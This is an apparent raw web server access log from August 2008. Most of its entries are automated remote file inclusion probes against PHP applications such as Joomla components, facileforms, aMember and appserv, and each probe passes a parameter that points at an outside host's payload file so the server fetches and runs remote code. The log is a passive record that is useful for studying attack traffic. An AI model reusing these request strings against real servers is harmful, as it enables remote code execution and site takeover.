67.18.158.130 - - [02/Aug/2008:01:51:35 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
67.18.158.130 - - [02/Aug/2008:01:51:52 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
70.85.201.66 - - [02/Aug/2008:01:55:35 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
70.85.201.66 - - [02/Aug/2008:01:55:45 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
202.30.194.70 - - [02/Aug/2008:02:04:39 +0200] "GET /err-r_log-www.infos.dk//appserv/main.php?appserv_root=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
202.30.194.70 - - [02/Aug/2008:02:04:39 +0200] "GET //appserv/main.php?appserv_root=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
69.90.47.14 - - [02/Aug/2008:02:13:47 +0200] "GET /err-r_log-www.infos.dk//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
69.90.47.14 - - [02/Aug/2008:02:13:47 +0200] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
80.67.24.32 - - [02/Aug/2008:02:16:40 +0200] "GET //faqsupport/home.category.php?path%5Bdocroot%5D=http://www.sportsdorks.biz/bo.do.jpg??? HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.199.244.42 - - [02/Aug/2008:02:24:23 +0200] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
66.199.244.42 - - [02/Aug/2008:02:24:23 +0200] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
194.72.238.61 - - [02/Aug/2008:02:28:14 +0200] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
66.199.244.42 - - [02/Aug/2008:02:36:25 +0200] "GET //faqsupport/home.category.php?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
67.195.37.94 - - [02/Aug/2008:02:42:23 +0200] "GET /robots.txt HTTP/1.0" 302 202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.94 - - [02/Aug/2008:02:42:24 +0200] "GET /err-r_log-www.infos.dk HTTP/1.0" 200 2041 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
199.237.232.25 - - [02/Aug/2008:03:01:37 +0200] "GET /images/errors.php?error=http://dantman.com/.../rid??? HTTP/1.0" 302 202 "-" "libwww-perl/5.50"
202.190.203.220 - - [02/Aug/2008:03:05:17 +0200] "GET /images/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
194.79.75.195 - - [02/Aug/2008:03:18:59 +0200] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
194.85.89.114 - - [02/Aug/2008:03:25:30 +0200] "GET /err-r_log-www.infos.dk//admin/index.php?o=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
194.85.89.114 - - [02/Aug/2008:03:25:38 +0200] "GET //admin/index.php?o=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
62.76.116.20 - - [02/Aug/2008:03:28:48 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
62.76.116.20 - - [02/Aug/2008:03:28:48 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
66.254.98.142 - - [02/Aug/2008:03:28:51 +0200] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
66.254.98.142 - - [02/Aug/2008:03:29:05 +0200] "GET /err-r_log-www.infos.dk//components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
70.85.48.114 - - [02/Aug/2008:03:30:20 +0200] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 302 214 "-" "Avant Browser (http://www.avantbrowser.com)"
207.44.152.61 - - [02/Aug/2008:03:34:11 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 302 202 "-" "Mozilla/5.0"
207.58.151.211 - - [02/Aug/2008:03:53:58 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.deanlebaron.com/ubbthreads/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
207.58.151.211 - - [02/Aug/2008:03:53:59 +0200] "GET /errors.php?error=http://www.deanlebaron.com/ubbthreads/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
80.74.146.175 - - [02/Aug/2008:03:56:44 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
80.74.146.175 - - [02/Aug/2008:03:56:44 +0200] "GET //?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
202.181.210.195 - - [02/Aug/2008:04:01:09 +0200] "GET //?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 3425 "-" "libwww-perl/5.79"
202.181.210.195 - - [02/Aug/2008:04:01:09 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
193.207.106.54 - - [02/Aug/2008:04:04:27 +0200] "GET //?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 3425 "-" "libwww-perl/5.79"
74.6.8.120 - - [02/Aug/2008:04:04:27 +0200] "GET /robots.txt HTTP/1.0" 302 202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.120 - - [02/Aug/2008:04:04:29 +0200] "GET /html/ HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.207.106.54 - - [02/Aug/2008:04:04:33 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
208.80.193.44 - - [02/Aug/2008:04:05:02 +0200] "GET / HTTP/1.0" 200 3413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; ImageShack Toolbar 3.0.3)"
200.201.8.9 - - [02/Aug/2008:04:06:54 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
200.201.8.9 - - [02/Aug/2008:04:06:55 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://neu_2.lasrv-1.de/web/%20/.../ident.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.214.24.238 - - [02/Aug/2008:04:07:27 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.214.24.238 - - [02/Aug/2008:04:07:27 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.214.24.238 - - [02/Aug/2008:04:09:40 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.214.24.238 - - [02/Aug/2008:04:09:41 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
81.169.158.65 - - [02/Aug/2008:04:17:42 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:17:42 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:17:43 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:17:43 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:22:37 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:22:37 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:22:37 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:04:22:37 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
58.65.228.5 - - [02/Aug/2008:04:29:19 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 302 202 "-" "Mozilla/5.0"
58.65.228.5 - - [02/Aug/2008:04:29:20 +0200] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 302 202 "-" "Mozilla/5.0"
82.165.253.72 - - [02/Aug/2008:04:39:08 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.165.253.72 - - [02/Aug/2008:04:39:09 +0200] "GET /errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.165.253.72 - - [02/Aug/2008:04:52:21 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.165.253.72 - - [02/Aug/2008:04:52:21 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
84.21.71.133 - - [02/Aug/2008:04:57:08 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:04:57:09 +0200] "GET /err-r_log-www.infos.dk%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:04:59:57 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:04:59:58 +0200] "GET /err-r_log-www.infos.dk%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:05:00:04 +0200] "GET /err-r_log-www.infos.dk%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:05:00:04 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:05:01:12 +0200] "GET /err-r_log-www.infos.dk%20/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:05:01:12 +0200] "GET /components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
85.214.24.238 - - [02/Aug/2008:05:07:44 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=uid=628(kailarambacom)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
84.21.71.133 - - [02/Aug/2008:05:20:47 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:05:20:47 +0200] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
85.214.24.238 - - [02/Aug/2008:05:24:21 +0200] "GET /err-r_log-www.infos.dk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=uid=628(kailarambacom)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.214.24.238 - - [02/Aug/2008:05:24:22 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=uid=628(kailarambacom)%20gid=60006(www)%20groups=60006(www)%0A? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.18.81.164 - - [02/Aug/2008:05:27:58 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
208.98.1.12 - - [02/Aug/2008:05:29:22 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.254.226.234 - - [02/Aug/2008:05:29:44 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
85.214.41.164 - - [02/Aug/2008:05:31:04 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
89.111.172.23 - - [02/Aug/2008:05:32:58 +0200] "GET //appserv/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
89.111.172.23 - - [02/Aug/2008:05:32:59 +0200] "GET /err-r_log-www.infos.dk//appserv/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
202.133.244.61 - - [02/Aug/2008:05:34:53 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gamesport.cz/bannery/id1.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
67.19.204.226 - - [02/Aug/2008:05:36:55 +0200] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.810"
67.19.204.226 - - [02/Aug/2008:05:36:55 +0200] "GET /access_log-www.infos.dk//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
59.188.7.232 - - [02/Aug/2008:05:37:33 +0200] "GET /err-r_log-www.infos.dk//appserv/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:05:37:34 +0200] "GET //appserv/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.214.24.238 - - [02/Aug/2008:05:40:22 +0200] "GET /err-r_log-www.infos.dk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.214.24.238 - - [02/Aug/2008:05:40:22 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_pat=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
202.133.244.61 - - [02/Aug/2008:05:41:26 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gamesport.cz/bannery/response.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
202.133.244.61 - - [02/Aug/2008:05:41:26 +0200] "GET /err-r_log-www.infos.dk//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gamesport.cz/bannery/response.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
202.133.244.61 - - [02/Aug/2008:05:44:27 +0200] "GET /err-r_log-www.infos.dk//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gamesport.cz/bannery/id1.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
202.133.244.61 - - [02/Aug/2008:05:44:29 +0200] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gamesport.cz/bannery/id1.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
67.19.204.226 - - [02/Aug/2008:05:46:45 +0200] "GET /err-r_log-www.infos.dk%20//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
74.6.22.159 - - [02/Aug/2008:05:54:51 +0200] "GET /access_log-www.infos.dk HTTP/1.0" 200 17839 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.21.71.133 - - [02/Aug/2008:05:55:38 +0200] "GET /err-r_log-www.infos.dk%20//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:05:55:38 +0200] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
67.15.8.80 - - [02/Aug/2008:05:59:41 +0200] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.65"
67.15.8.80 - - [02/Aug/2008:05:59:41 +0200] "GET /access_log-www.infos.dk//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
72.248.189.82 - - [02/Aug/2008:06:05:55 +0200] "GET /err-r_log-www.infos.dk%20//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.248.189.82 - - [02/Aug/2008:06:05:58 +0200] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
89.186.169.135 - - [02/Aug/2008:06:25:04 +0200] "GET /faqsupport/include.php?path[docroot]=http://h-pro.ru/lang/inc? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.232.81.78 - - [02/Aug/2008:06:28:38 +0200] "GET /access_log-www.infos.dk HTTP/1.1" 200 19278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.6.22.159 - - [02/Aug/2008:06:29:32 +0200] "GET /mig2 HTTP/1.0" 200 242466 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.27.166 - - [02/Aug/2008:06:44:53 +0200] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
67.15.8.80 - - [02/Aug/2008:06:46:04 +0200] "GET /err-r_log-www.infos.dk%20//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
80.67.27.166 - - [02/Aug/2008:07:01:45 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
80.67.27.166 - - [02/Aug/2008:07:01:45 +0200] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hardsecurity.org/ALBANIA?? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
85.214.24.238 - - [02/Aug/2008:07:09:47 +0200] "GET /err-r_log-www.infos.dk//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
85.214.24.238 - - [02/Aug/2008:07:09:47 +0200] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.69"
207.44.152.61 - - [02/Aug/2008:07:12:49 +0200] "GET /err-r_log-www.infos.dk//administrator/index2.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
207.44.152.61 - - [02/Aug/2008:07:12:50 +0200] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
207.44.152.61 - - [02/Aug/2008:07:12:50 +0200] "GET /err-r_log-www.infos.dk//administrator/index2.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
207.44.152.61 - - [02/Aug/2008:07:12:51 +0200] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
216.75.35.118 - - [02/Aug/2008:07:28:15 +0200] "GET /err-r_log-www.infos.dk/mambots/content/josowbot.content.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
216.75.35.118 - - [02/Aug/2008:07:28:15 +0200] "GET /mambots/content/josowbot.content.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
125.24.86.179 - - [02/Aug/2008:07:28:37 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
203.22.204.92 - - [02/Aug/2008:07:35:18 +0200] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.76"
74.52.239.114 - - [02/Aug/2008:07:35:35 +0200] "GET /errors.php?error=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
91.188.128.5 - - [02/Aug/2008:07:37:02 +0200] "GET /err-r_log-www.infos.dk//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
91.188.128.5 - - [02/Aug/2008:07:37:02 +0200] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
70.85.48.194 - - [02/Aug/2008:07:42:10 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
194.79.75.195 - - [02/Aug/2008:07:43:33 +0200] "GET //administrator/index.php?mosConfig_absolute_path=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 302 214 "-" "Avant Browser (http://www.avantbrowser.com)"
125.24.86.179 - - [02/Aug/2008:07:45:22 +0200] "GET /err-r_log-www.infos.dk//include/bbs.lib.inc.php?site_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
125.24.86.179 - - [02/Aug/2008:07:45:27 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
203.22.204.92 - - [02/Aug/2008:07:46:26 +0200] "GET ///vwar/backup/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.76"
125.24.86.179 - - [02/Aug/2008:07:47:57 +0200] "GET /err-r_log-www.infos.dk//include/bbs.lib.inc.php?site_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
125.24.86.179 - - [02/Aug/2008:07:48:05 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
62.76.116.20 - - [02/Aug/2008:07:53:23 +0200] "GET /err-r_log-www.infos.dk//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
62.76.116.20 - - [02/Aug/2008:07:53:25 +0200] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
